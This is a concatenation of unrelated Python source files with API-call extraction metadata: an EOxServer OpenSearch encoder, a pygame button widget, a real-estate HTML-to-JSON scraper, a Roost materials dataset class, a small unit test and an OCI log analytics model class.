| [((518, 552), 'os.path.exists', 'path.exists', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (529, 552), False, 'from os import environ, path, sep\n'), ((555, 623), 'unittest.skipUnless', 'unittest.skipUnless', (['senna_is_installed', '"""Requires Senna executable"""'], {}), "(senna_is_installed, 'Requires Senna executable')\n", (574, 623), False, 'import unittest\n'), ((1337, 1405), 'unittest.skipUnless', 'unittest.skipUnless', (['senna_is_installed', '"""Requires Senna executable"""'], {}), "(senna_is_installed, 'Requires Senna executable')\n", (1356, 1405), False, 'import unittest\n'), ((400, 431), 'os.path.normpath', 'path.normpath', (["environ['SENNA']"], {}), "(environ['SENNA'])\n", (413, 431), False, 'from os import environ, path, sep\n'), ((806, 857), 'nltk.classify.Senna', 'Senna', (['SENNA_EXECUTABLE_PATH', "['pos', 'chk', 'ner']"], {}), "(SENNA_EXECUTABLE_PATH, ['pos', 'chk', 'ner'])\n", (811, 857), False, 'from nltk.classify import Senna\n'), ((1537, 1571), 'nltk.tag.SennaTagger', 'SennaTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (1548, 1571), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n'), ((1946, 1985), 'nltk.tag.SennaChunkTagger', 'SennaChunkTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (1962, 1985), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n'), ((2616, 2653), 'nltk.tag.SennaNERTagger', 'SennaNERTagger', (['SENNA_EXECUTABLE_PATH'], {}), '(SENNA_EXECUTABLE_PATH)\n', (2630, 2653), False, 'from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger\n')] |
#-------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: <NAME> <<EMAIL>>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2015 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from itertools import chain
from lxml.builder import ElementMaker
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
from django.shortcuts import get_object_or_404
from eoxserver.core.config import get_eoxserver_config
from eoxserver.core.util.xmltools import (
XMLEncoder, NameSpace, NameSpaceMap
)
from eoxserver.resources.coverages import models
from eoxserver.services.opensearch.formats import get_formats
from eoxserver.services.opensearch.extensions import get_extensions
from eoxserver.services.opensearch.config import OpenSearchConfigReader
class OpenSearch11DescriptionEncoder(XMLEncoder):
content_type = "application/opensearchdescription+xml"
def __init__(self, search_extensions):
ns_os = NameSpace("http://a9.com/-/spec/opensearch/1.1/", None)
self.ns_param = ns_param = NameSpace(
"http://a9.com/-/spec/opensearch/extensions/parameters/1.0/",
"parameters"
)
ns_atom = NameSpace("http://www.w3.org/2005/Atom", "atom")
nsmap = NameSpaceMap(ns_os, ns_param, ns_atom)
for search_extension in search_extensions:
nsmap.add(search_extension.namespace)
self.OS = ElementMaker(namespace=ns_os.uri, nsmap=nsmap)
self.PARAM = ElementMaker(namespace=ns_param.uri, nsmap=nsmap)
self.ATOM = ElementMaker(namespace=ns_atom.uri, nsmap=nsmap)
self.search_extensions = search_extensions
def encode_description(self, request, collection, result_formats):
""" Encode an OpenSearch 1.1 description document.
"""
OS = self.OS
description = OS("OpenSearchDescription",
OS("ShortName",
collection.identifier if collection is not None else ""
),
OS("Description")
)
for method in ("GET", "POST"):
description.extend([
self.encode_url(
request, collection, result_format, method
)
for result_format in result_formats
])
description.extend([
OS("Contact"),
OS("Tags", "CEOS-OS-BP-V1.1/L1"),
OS("LongName"),
OS("Developer"),
OS("Attribution"),
OS("SyndicationRight", "open"),
OS("AdultContent"),
OS("Language"),
OS("InputEncoding"),
OS("OutputEncoding")
])
return description
def encode_url(self, request, collection, result_format, method):
""" Encode a single opensearch URL, either for a specific collection, or
the whole service.
"""
if collection is not None:
search_url = reverse("opensearch:collection:search",
kwargs={
"collection_id": collection.identifier,
"format_name": result_format.name
}
)
else:
search_url = reverse("opensearch:search",
kwargs={
"format_name": result_format.name
}
)
conf = OpenSearchConfigReader(get_eoxserver_config())
search_url = request.build_absolute_uri(search_url)
default_parameters = (
dict(name="q", type="searchTerms", profiles=[
]),
dict(name="count", type="count", min=0, max=conf.max_count),
dict(name="startIndex", type="startIndex", min=0),
)
parameters = list(chain(default_parameters, *[
[
dict(parameter, **{"namespace": search_extension.namespace})
for parameter in search_extension.get_schema(
collection,
models.Collection if collection is None else models.Product
)
] for search_extension in self.search_extensions
]))
query_template = "&".join(
"%s={%s%s%s%s}" % (
parameter["name"],
parameter["namespace"].prefix
if "namespace" in parameter else "",
":" if "namespace" in parameter else "",
parameter["type"],
"?" if parameter.get("optional", True) else ""
)
for parameter in parameters
)
url = self.OS("Url", *[
self.encode_parameter(parameter, parameter.get("namespace"))
for parameter in parameters
],
type=result_format.mimetype,
template="%s?%s" % (search_url, query_template)
if method == "GET" else search_url,
rel="results" if collection is not None else "collection", ** {
self.ns_param("method"): method,
self.ns_param("enctype"): "application/x-www-form-urlencoded",
"indexOffset": "0"
}
)
return url
def encode_parameter(self, parameter, namespace):
options = parameter.pop("options", [])
profiles = parameter.pop("profiles", [])
attributes = {"name": parameter["name"]}
if namespace:
attributes["value"] = "{%s:%s}" % (
namespace.prefix, parameter.pop("type")
)
else:
attributes["value"] = "{%s}" % parameter.pop("type")
if 'min' in parameter:
attributes['minInclusive'] = str(parameter['min'])
if 'max' in parameter:
attributes['maxInclusive'] = str(parameter['max'])
pattern = parameter.get("pattern")
if pattern:
attributes["pattern"] = pattern
return self.PARAM("Parameter", *[
self.PARAM("Option", value=option, label=option)
for option in options
] + [
self.ATOM("link",
rel="profile", href=profile["href"], title=profile["title"]
)
for profile in profiles
], minimum="0" if parameter.get("optional", True) else "1", maximum="1",
**attributes
)
class OpenSearch11DescriptionHandler(object):
def handle(self, request, collection_id=None):
collection = None
if collection_id:
collection = get_object_or_404(models.Collection,
identifier=collection_id
)
encoder = OpenSearch11DescriptionEncoder([
extension() for extension in get_extensions()
])
return (
encoder.serialize(
encoder.encode_description(
request, collection, [format_() for format_ in get_formats()]
)
),
encoder.content_type
)
| [
"eoxserver.core.config.get_eoxserver_config",
"eoxserver.services.opensearch.extensions.get_extensions",
"eoxserver.core.util.xmltools.NameSpaceMap",
"django.shortcuts.get_object_or_404",
"eoxserver.services.opensearch.formats.get_formats",
"django.urls.reverse",
"eoxserver.core.util.xmltools.NameSpace",
"lxml.builder.ElementMaker"
]
| [((2220, 2275), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://a9.com/-/spec/opensearch/1.1/"""', 'None'], {}), "('http://a9.com/-/spec/opensearch/1.1/', None)\n", (2229, 2275), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2311, 2400), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://a9.com/-/spec/opensearch/extensions/parameters/1.0/"""', '"""parameters"""'], {}), "('http://a9.com/-/spec/opensearch/extensions/parameters/1.0/',\n 'parameters')\n", (2320, 2400), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2449, 2497), 'eoxserver.core.util.xmltools.NameSpace', 'NameSpace', (['"""http://www.w3.org/2005/Atom"""', '"""atom"""'], {}), "('http://www.w3.org/2005/Atom', 'atom')\n", (2458, 2497), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2514, 2552), 'eoxserver.core.util.xmltools.NameSpaceMap', 'NameSpaceMap', (['ns_os', 'ns_param', 'ns_atom'], {}), '(ns_os, ns_param, ns_atom)\n', (2526, 2552), False, 'from eoxserver.core.util.xmltools import XMLEncoder, NameSpace, NameSpaceMap\n'), ((2672, 2718), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_os.uri', 'nsmap': 'nsmap'}), '(namespace=ns_os.uri, nsmap=nsmap)\n', (2684, 2718), False, 'from lxml.builder import ElementMaker\n'), ((2740, 2789), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_param.uri', 'nsmap': 'nsmap'}), '(namespace=ns_param.uri, nsmap=nsmap)\n', (2752, 2789), False, 'from lxml.builder import ElementMaker\n'), ((2810, 2858), 'lxml.builder.ElementMaker', 'ElementMaker', ([], {'namespace': 'ns_atom.uri', 'nsmap': 'nsmap'}), '(namespace=ns_atom.uri, nsmap=nsmap)\n', (2822, 2858), False, 'from lxml.builder import ElementMaker\n'), ((4185, 4313), 'django.urls.reverse', 'reverse', (['"""opensearch:collection:search"""'], {'kwargs': "{'collection_id': collection.identifier, 'format_name': result_format.name}"}), "('opensearch:collection:search', kwargs={'collection_id': collection\n .identifier, 'format_name': result_format.name})\n", (4192, 4313), False, 'from django.urls import reverse\n'), ((4435, 4507), 'django.urls.reverse', 'reverse', (['"""opensearch:search"""'], {'kwargs': "{'format_name': result_format.name}"}), "('opensearch:search', kwargs={'format_name': result_format.name})\n", (4442, 4507), False, 'from django.urls import reverse\n'), ((4614, 4636), 'eoxserver.core.config.get_eoxserver_config', 'get_eoxserver_config', ([], {}), '()\n', (4634, 4636), False, 'from eoxserver.core.config import get_eoxserver_config\n'), ((7702, 7764), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['models.Collection'], {'identifier': 'collection_id'}), '(models.Collection, identifier=collection_id)\n', (7719, 7764), False, 'from django.shortcuts import get_object_or_404\n'), ((7887, 7903), 'eoxserver.services.opensearch.extensions.get_extensions', 'get_extensions', ([], {}), '()\n', (7901, 7903), False, 'from eoxserver.services.opensearch.extensions import get_extensions\n'), ((8074, 8087), 'eoxserver.services.opensearch.formats.get_formats', 'get_formats', ([], {}), '()\n', (8085, 8087), False, 'from eoxserver.services.opensearch.formats import get_formats\n')] |
from pygame import Surface, font
from .basewidget import BaseWidget
from frontend import Renderer, WidgetHandler
class Button(BaseWidget):
action = None
def __init__(self, x, y, texto, action=None):
self.f = font.SysFont('Verdana', 16)
imagen = self.crear(texto)
rect = imagen.get_rect(topleft=(x, y))
super().__init__(imagen, rect)
Renderer.add_widget(self, 1)
WidgetHandler.add_widget(self, 1)
self.action = action
def crear(self, texto):
w, h = self.f.size(texto)
image = Surface((w + 4, h + 2))
image.fill((125, 125, 125), (1, 1, w+2, h))
render = self.f.render(texto, 1, (255, 255, 255), (125, 125, 125))
image.blit(render, (2, 1))
return image
def on_mousebuttondown(self, button):
if button == 1 and self.action is not None:
self.action()
def on_mouseover(self):
pass
def update(self):
self.dirty = 1
| [
"frontend.Renderer.add_widget",
"frontend.WidgetHandler.add_widget",
"pygame.font.SysFont",
"pygame.Surface"
]
| [((227, 254), 'pygame.font.SysFont', 'font.SysFont', (['"""Verdana"""', '(16)'], {}), "('Verdana', 16)\n", (239, 254), False, 'from pygame import Surface, font\n'), ((384, 412), 'frontend.Renderer.add_widget', 'Renderer.add_widget', (['self', '(1)'], {}), '(self, 1)\n', (403, 412), False, 'from frontend import Renderer, WidgetHandler\n'), ((421, 454), 'frontend.WidgetHandler.add_widget', 'WidgetHandler.add_widget', (['self', '(1)'], {}), '(self, 1)\n', (445, 454), False, 'from frontend import Renderer, WidgetHandler\n'), ((563, 586), 'pygame.Surface', 'Surface', (['(w + 4, h + 2)'], {}), '((w + 4, h + 2))\n', (570, 586), False, 'from pygame import Surface, font\n')] |
import glob
import bs4
import gzip
import pickle
import re
import os
from concurrent.futures import ProcessPoolExecutor as PPE
import json
from pathlib import Path
from hashlib import sha256
import shutil
Path('json').mkdir(exist_ok=True)
def sanitize(text):
text = re.sub(r'(\t|\n|\r)', '', text)
text = re.sub(r'\xa0', '', text)
text = re.sub(r'\\r', '', text)
text = re.sub('地図で物件の周辺環境をチェック!', '', text)
return text
def is_train(x):
if '線' in x:
return False
else:
return True
def pmap(arg):
key, fns = arg
SIZE = len(fns)
for index, fn in enumerate(fns):
try:
print('now', key,index, 'size', SIZE, fn)
html = gzip.decompress(open(fn, 'rb').read())
soup = bs4.BeautifulSoup(html, 'lxml')
if soup.find('link', {'rel':'canonical'}) is None:
Path(fn).unlink()
continue
canonical = soup.find('link', {'rel':'canonical'})['href']
if '/detail/' not in canonical:
Path(fn).unlink()
continue
basic_table = soup.find('div', {'class':'detail_basicInfo'})
if basic_table is None:
Path(fn).unlink()
continue
basic_table = basic_table.find('table')
# ズレの処理
tds = list(basic_table.find_all('td'))
tds.pop(0)
#print(tds.pop(0).text)
tds = [td for td in tds if is_train(td)]
print(len(basic_table.find_all('th')), len(tds))
if len(basic_table.find_all('th')) == 13 and len(tds) == 14:
tds.pop(4)
...
basic_obj = {sanitize(th.text):sanitize(td.text) for th, td in zip(basic_table.find_all('th'),tds)}
detail_obj = {}
for table in soup.find('div', {'class':'detail_specTable'}).find_all('table'):
#print(table)
for th, td in zip(table.find_all('th'), table.find_all('td')):
detail_obj[sanitize(th.text)] = sanitize(td.text)
obj = {'basic':basic_obj, 'detail':detail_obj, 'canonical':canonical, 'title':soup.title.text}
last_fn = fn.split('/')[-1]
shutil.move(fn, f'parsed_htmls/{last_fn}' )
with open(f'json/{last_fn}', 'w') as fp:
fp.write(json.dumps(obj, indent=2, ensure_ascii=False))
except Exception as ex:
#Path(fn).unlink()
print(ex)
#detail_table = soup.find('table', {'class':'bukken_detail_table'})
#detail_obj = {re.sub(r'\t', '', th.text):re.sub(r'(\t|\n)', '', td.text) for th, td in zip(detail_table.find_all('th'), detail_table.find_all('td'))}
#print(detail_obj)
#urls = [sha256(bytes(v, 'utf8')).hexdigest() for v in json.load(fp=open('./hash_url.json')).values()]
#fns = [f'./htmls/{url}' for url in urls]
import random
files = glob.glob('./htmls/*')
random.shuffle(files)
args = {}
for index, fn in enumerate(files):
key = index%8
if args.get(key) is None:
args[key] = []
args[key].append(fn)
args = [(key,fns) for key,fns in args.items()]
#[pmap(arg) for arg in args]
with PPE(max_workers=8) as exe:
exe.map(pmap, args)
| [
"random.shuffle",
"pathlib.Path",
"shutil.move",
"json.dumps",
"bs4.BeautifulSoup",
"concurrent.futures.ProcessPoolExecutor",
"re.sub",
"glob.glob"
]
| [((2929, 2951), 'glob.glob', 'glob.glob', (['"""./htmls/*"""'], {}), "('./htmls/*')\n", (2938, 2951), False, 'import glob\n'), ((2952, 2973), 'random.shuffle', 'random.shuffle', (['files'], {}), '(files)\n', (2966, 2973), False, 'import random\n'), ((273, 306), 're.sub', 're.sub', (['"""(\\\\t|\\\\n|\\\\r)"""', '""""""', 'text'], {}), "('(\\\\t|\\\\n|\\\\r)', '', text)\n", (279, 306), False, 'import re\n'), ((316, 341), 're.sub', 're.sub', (['"""\\\\xa0"""', '""""""', 'text'], {}), "('\\\\xa0', '', text)\n", (322, 341), False, 'import re\n'), ((353, 378), 're.sub', 're.sub', (['"""\\\\\\\\r"""', '""""""', 'text'], {}), "('\\\\\\\\r', '', text)\n", (359, 378), False, 'import re\n'), ((389, 425), 're.sub', 're.sub', (['"""地図で物件の周辺環境をチェック!"""', '""""""', 'text'], {}), "('地図で物件の周辺環境をチェック!', '', text)\n", (395, 425), False, 'import re\n'), ((3196, 3214), 'concurrent.futures.ProcessPoolExecutor', 'PPE', ([], {'max_workers': '(8)'}), '(max_workers=8)\n', (3199, 3214), True, 'from concurrent.futures import ProcessPoolExecutor as PPE\n'), ((207, 219), 'pathlib.Path', 'Path', (['"""json"""'], {}), "('json')\n", (211, 219), False, 'from pathlib import Path\n'), ((764, 795), 'bs4.BeautifulSoup', 'bs4.BeautifulSoup', (['html', '"""lxml"""'], {}), "(html, 'lxml')\n", (781, 795), False, 'import bs4\n'), ((2246, 2288), 'shutil.move', 'shutil.move', (['fn', 'f"""parsed_htmls/{last_fn}"""'], {}), "(fn, f'parsed_htmls/{last_fn}')\n", (2257, 2288), False, 'import shutil\n'), ((2368, 2413), 'json.dumps', 'json.dumps', (['obj'], {'indent': '(2)', 'ensure_ascii': '(False)'}), '(obj, indent=2, ensure_ascii=False)\n', (2378, 2413), False, 'import json\n'), ((875, 883), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (879, 883), False, 'from pathlib import Path\n'), ((1049, 1057), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (1053, 1057), False, 'from pathlib import Path\n'), ((1217, 1225), 'pathlib.Path', 'Path', (['fn'], {}), '(fn)\n', (1221, 1225), False, 'from pathlib import Path\n')] |
import functools
import json
from os.path import abspath, dirname, exists, join
from typing import Dict, Sequence
import numpy as np
import pandas as pd
import torch
from pymatgen.core import Composition
from torch.utils.data import Dataset
class CompositionData(Dataset):
def __init__(
self,
df: pd.DataFrame,
task_dict: Dict[str, str],
elem_emb: str = "matscholar200",
inputs: Sequence[str] = ["composition"],
identifiers: Sequence[str] = ["material_id", "composition"],
):
"""Data class for Roost models.
Args:
df (pd.DataFrame): Pandas dataframe holding input and target values.
task_dict (dict[str, "regression" | "classification"]): Map from target names to task
type.
elem_emb (str, optional): One of "matscholar200", "cgcnn92", "megnet16", "onehot112" or
path to a file with custom embeddings. Defaults to "matscholar200".
inputs (list[str], optional): df column name holding material compositions.
Defaults to ["composition"].
identifiers (list, optional): df columns for distinguishing data points. Will be
copied over into the model's output CSV. Defaults to ["material_id", "composition"].
"""
assert len(identifiers) == 2, "Two identifiers are required"
assert len(inputs) == 1, "One input column required are required"
self.inputs = inputs
self.task_dict = task_dict
self.identifiers = identifiers
self.df = df
if elem_emb in ["matscholar200", "cgcnn92", "megnet16", "onehot112"]:
elem_emb = join(
dirname(abspath(__file__)), f"../embeddings/element/{elem_emb}.json"
)
else:
assert exists(elem_emb), f"{elem_emb} does not exist!"
with open(elem_emb) as f:
self.elem_features = json.load(f)
self.elem_emb_len = len(list(self.elem_features.values())[0])
self.n_targets = []
for target, task in self.task_dict.items():
if task == "regression":
self.n_targets.append(1)
elif task == "classification":
n_classes = np.max(self.df[target].values) + 1
self.n_targets.append(n_classes)
def __len__(self):
return len(self.df)
@functools.lru_cache(maxsize=None) # Cache data for faster training
def __getitem__(self, idx):
"""[summary]
Args:
idx (int): dataset index
Raises:
AssertionError: [description]
ValueError: [description]
Returns:
atom_weights: torch.Tensor shape (M, 1)
weights of atoms in the material
atom_fea: torch.Tensor shape (M, n_fea)
features of atoms in the material
self_fea_idx: torch.Tensor shape (M*M, 1)
list of self indices
nbr_fea_idx: torch.Tensor shape (M*M, 1)
list of neighbor indices
target: torch.Tensor shape (1,)
target value for material
cry_id: torch.Tensor shape (1,)
input id for the material
"""
df_idx = self.df.iloc[idx]
composition = df_idx[self.inputs][0]
cry_ids = df_idx[self.identifiers].values
comp_dict = Composition(composition).get_el_amt_dict()
elements = list(comp_dict.keys())
weights = list(comp_dict.values())
weights = np.atleast_2d(weights).T / np.sum(weights)
try:
atom_fea = np.vstack([self.elem_features[element] for element in elements])
except AssertionError:
raise AssertionError(
f"cry-id {cry_ids[0]} [{composition}] contains element types not in embedding"
)
except ValueError:
raise ValueError(
f"cry-id {cry_ids[0]} [{composition}] composition cannot be parsed into elements"
)
nele = len(elements)
self_fea_idx = []
nbr_fea_idx = []
for i, _ in enumerate(elements):
self_fea_idx += [i] * nele
nbr_fea_idx += list(range(nele))
# convert all data to tensors
atom_weights = torch.Tensor(weights)
atom_fea = torch.Tensor(atom_fea)
self_fea_idx = torch.LongTensor(self_fea_idx)
nbr_fea_idx = torch.LongTensor(nbr_fea_idx)
targets = []
for target in self.task_dict:
if self.task_dict[target] == "regression":
targets.append(torch.Tensor([df_idx[target]]))
elif self.task_dict[target] == "classification":
targets.append(torch.LongTensor([df_idx[target]]))
return (
(atom_weights, atom_fea, self_fea_idx, nbr_fea_idx),
targets,
*cry_ids,
)
def collate_batch(dataset_list):
"""
Collate a list of data and return a batch for predicting crystal
properties.
Parameters
----------
dataset_list: list of tuples for each data point.
(atom_fea, nbr_fea, nbr_fea_idx, target)
atom_fea: torch.Tensor shape (n_i, atom_fea_len)
nbr_fea: torch.Tensor shape (n_i, M, nbr_fea_len)
self_fea_idx: torch.LongTensor shape (n_i, M)
nbr_fea_idx: torch.LongTensor shape (n_i, M)
target: torch.Tensor shape (1, )
cif_id: str or int
Returns
-------
N = sum(n_i); N0 = sum(i)
batch_atom_weights: torch.Tensor shape (N, 1)
batch_atom_fea: torch.Tensor shape (N, orig_atom_fea_len)
Atom features from atom type
batch_self_fea_idx: torch.LongTensor shape (N, M)
Indices of mapping atom to copies of itself
batch_nbr_fea_idx: torch.LongTensor shape (N, M)
Indices of M neighbors of each atom
crystal_atom_idx: list of torch.LongTensor of length N0
Mapping from the crystal idx to atom idx
target: torch.Tensor shape (N, 1)
Target value for prediction
batch_comps: list
batch_ids: list
"""
# define the lists
batch_atom_weights = []
batch_atom_fea = []
batch_self_fea_idx = []
batch_nbr_fea_idx = []
crystal_atom_idx = []
batch_targets = []
batch_cry_ids = []
cry_base_idx = 0
for i, (inputs, target, *cry_ids) in enumerate(dataset_list):
atom_weights, atom_fea, self_fea_idx, nbr_fea_idx = inputs
# number of atoms for this crystal
n_i = atom_fea.shape[0]
# batch the features together
batch_atom_weights.append(atom_weights)
batch_atom_fea.append(atom_fea)
# mappings from bonds to atoms
batch_self_fea_idx.append(self_fea_idx + cry_base_idx)
batch_nbr_fea_idx.append(nbr_fea_idx + cry_base_idx)
# mapping from atoms to crystals
crystal_atom_idx.append(torch.tensor([i] * n_i))
# batch the targets and ids
batch_targets.append(target)
batch_cry_ids.append(cry_ids)
# increment the id counter
cry_base_idx += n_i
return (
(
torch.cat(batch_atom_weights, dim=0),
torch.cat(batch_atom_fea, dim=0),
torch.cat(batch_self_fea_idx, dim=0),
torch.cat(batch_nbr_fea_idx, dim=0),
torch.cat(crystal_atom_idx),
),
tuple(torch.stack(b_target, dim=0) for b_target in zip(*batch_targets)),
*zip(*batch_cry_ids),
)
| [
"os.path.exists",
"numpy.atleast_2d",
"torch.LongTensor",
"torch.stack",
"torch.Tensor",
"pymatgen.core.Composition",
"numpy.max",
"numpy.sum",
"torch.tensor",
"numpy.vstack",
"json.load",
"functools.lru_cache",
"os.path.abspath",
"torch.cat"
]
| [((2395, 2428), 'functools.lru_cache', 'functools.lru_cache', ([], {'maxsize': 'None'}), '(maxsize=None)\n', (2414, 2428), False, 'import functools\n'), ((4310, 4331), 'torch.Tensor', 'torch.Tensor', (['weights'], {}), '(weights)\n', (4322, 4331), False, 'import torch\n'), ((4351, 4373), 'torch.Tensor', 'torch.Tensor', (['atom_fea'], {}), '(atom_fea)\n', (4363, 4373), False, 'import torch\n'), ((4397, 4427), 'torch.LongTensor', 'torch.LongTensor', (['self_fea_idx'], {}), '(self_fea_idx)\n', (4413, 4427), False, 'import torch\n'), ((4450, 4479), 'torch.LongTensor', 'torch.LongTensor', (['nbr_fea_idx'], {}), '(nbr_fea_idx)\n', (4466, 4479), False, 'import torch\n'), ((1823, 1839), 'os.path.exists', 'exists', (['elem_emb'], {}), '(elem_emb)\n', (1829, 1839), False, 'from os.path import abspath, dirname, exists, join\n'), ((1939, 1951), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1948, 1951), False, 'import json\n'), ((3581, 3596), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (3587, 3596), True, 'import numpy as np\n'), ((3634, 3698), 'numpy.vstack', 'np.vstack', (['[self.elem_features[element] for element in elements]'], {}), '([self.elem_features[element] for element in elements])\n', (3643, 3698), True, 'import numpy as np\n'), ((6901, 6924), 'torch.tensor', 'torch.tensor', (['([i] * n_i)'], {}), '([i] * n_i)\n', (6913, 6924), False, 'import torch\n'), ((7138, 7174), 'torch.cat', 'torch.cat', (['batch_atom_weights'], {'dim': '(0)'}), '(batch_atom_weights, dim=0)\n', (7147, 7174), False, 'import torch\n'), ((7188, 7220), 'torch.cat', 'torch.cat', (['batch_atom_fea'], {'dim': '(0)'}), '(batch_atom_fea, dim=0)\n', (7197, 7220), False, 'import torch\n'), ((7234, 7270), 'torch.cat', 'torch.cat', (['batch_self_fea_idx'], {'dim': '(0)'}), '(batch_self_fea_idx, dim=0)\n', (7243, 7270), False, 'import torch\n'), ((7284, 7319), 'torch.cat', 'torch.cat', (['batch_nbr_fea_idx'], {'dim': '(0)'}), '(batch_nbr_fea_idx, dim=0)\n', (7293, 7319), False, 'import torch\n'), ((7333, 7360), 'torch.cat', 'torch.cat', (['crystal_atom_idx'], {}), '(crystal_atom_idx)\n', (7342, 7360), False, 'import torch\n'), ((3407, 3431), 'pymatgen.core.Composition', 'Composition', (['composition'], {}), '(composition)\n', (3418, 3431), False, 'from pymatgen.core import Composition\n'), ((3554, 3576), 'numpy.atleast_2d', 'np.atleast_2d', (['weights'], {}), '(weights)\n', (3567, 3576), True, 'import numpy as np\n'), ((7387, 7415), 'torch.stack', 'torch.stack', (['b_target'], {'dim': '(0)'}), '(b_target, dim=0)\n', (7398, 7415), False, 'import torch\n'), ((1715, 1732), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (1722, 1732), False, 'from os.path import abspath, dirname, exists, join\n'), ((4626, 4656), 'torch.Tensor', 'torch.Tensor', (['[df_idx[target]]'], {}), '([df_idx[target]])\n', (4638, 4656), False, 'import torch\n'), ((2253, 2283), 'numpy.max', 'np.max', (['self.df[target].values'], {}), '(self.df[target].values)\n', (2259, 2283), True, 'import numpy as np\n'), ((4750, 4784), 'torch.LongTensor', 'torch.LongTensor', (['[df_idx[target]]'], {}), '([df_idx[target]])\n', (4766, 4784), False, 'import torch\n')] |
import unittest
from dq import util
class TestUtil(unittest.TestCase):
def test_safe_cast(self):
assert util.safe_cast('1', int) == 1
assert util.safe_cast('meow', int, 2) == 2
| [
"dq.util.safe_cast"
]
| [((120, 144), 'dq.util.safe_cast', 'util.safe_cast', (['"""1"""', 'int'], {}), "('1', int)\n", (134, 144), False, 'from dq import util\n'), ((165, 195), 'dq.util.safe_cast', 'util.safe_cast', (['"""meow"""', 'int', '(2)'], {}), "('meow', int, 2)\n", (179, 195), False, 'from dq import util\n')] |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LogAnalyticsAssociation(object):
"""
LogAnalyticsAssociation
"""
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "ACCEPTED"
LIFE_CYCLE_STATE_ACCEPTED = "ACCEPTED"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "IN_PROGRESS"
LIFE_CYCLE_STATE_IN_PROGRESS = "IN_PROGRESS"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "SUCCEEDED"
LIFE_CYCLE_STATE_SUCCEEDED = "SUCCEEDED"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "FAILED"
LIFE_CYCLE_STATE_FAILED = "FAILED"
def __init__(self, **kwargs):
"""
Initializes a new LogAnalyticsAssociation object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param failure_message:
The value to assign to the failure_message property of this LogAnalyticsAssociation.
:type failure_message: str
:param agent_id:
The value to assign to the agent_id property of this LogAnalyticsAssociation.
:type agent_id: str
:param time_last_attempted:
The value to assign to the time_last_attempted property of this LogAnalyticsAssociation.
:type time_last_attempted: datetime
:param retry_count:
The value to assign to the retry_count property of this LogAnalyticsAssociation.
:type retry_count: int
:param source_name:
The value to assign to the source_name property of this LogAnalyticsAssociation.
:type source_name: str
:param source_display_name:
The value to assign to the source_display_name property of this LogAnalyticsAssociation.
:type source_display_name: str
:param source_type_name:
The value to assign to the source_type_name property of this LogAnalyticsAssociation.
:type source_type_name: str
:param life_cycle_state:
The value to assign to the life_cycle_state property of this LogAnalyticsAssociation.
Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type life_cycle_state: str
:param entity_id:
The value to assign to the entity_id property of this LogAnalyticsAssociation.
:type entity_id: str
:param entity_name:
The value to assign to the entity_name property of this LogAnalyticsAssociation.
:type entity_name: str
:param entity_type_name:
The value to assign to the entity_type_name property of this LogAnalyticsAssociation.
:type entity_type_name: str
:param host:
The value to assign to the host property of this LogAnalyticsAssociation.
:type host: str
